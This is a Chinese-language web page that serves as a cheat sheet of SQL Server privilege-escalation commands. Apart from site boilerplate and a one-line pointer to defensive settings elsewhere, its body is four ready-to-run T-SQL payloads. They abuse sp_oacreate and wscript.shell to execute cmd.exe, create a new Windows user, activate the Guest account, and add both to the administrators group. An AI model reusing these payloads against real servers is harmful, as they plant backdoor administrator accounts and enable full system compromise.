主页 > 知识库 > SQL 提权 常用命令

SQL 提权 常用命令

热门标签:湖南电脑外呼系统平台 分享百度地图标注多个位置 外呼系统改进 广东防封卡外呼系统原理是什么 知名电销机器人价格 菏泽语音电销机器人加盟公司 电销机器人公司 需要哪些牌照 地图标注牌 长沙智能外呼系统
1、连接数据库
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名
2、添加新用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
3、把用户加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
4、激活GUEST用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'
5、把Guest加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'
关于防范方法,可以参考脚本之家服务器安全设置栏目。

标签:泉州 美容院 珠海 天水 西宁 商洛 呼和浩特 福建

巨人网络通讯声明:本文标题《SQL 提权 常用命令》,本文关键词  SQL,提权,常用,命令,SQL,提权,;如发现本文内容存在版权问题,烦请提供相关信息告之我们,我们将及时沟通与处理。本站内容系统采集于网络,涉及言论、版权与本站无关。
  • 相关文章
  • 下面列出与本文章《SQL 提权 常用命令》相关的同类信息!
  • 本页收集关于SQL 提权 常用命令的相关信息资讯供网民参考!
  • 推荐文章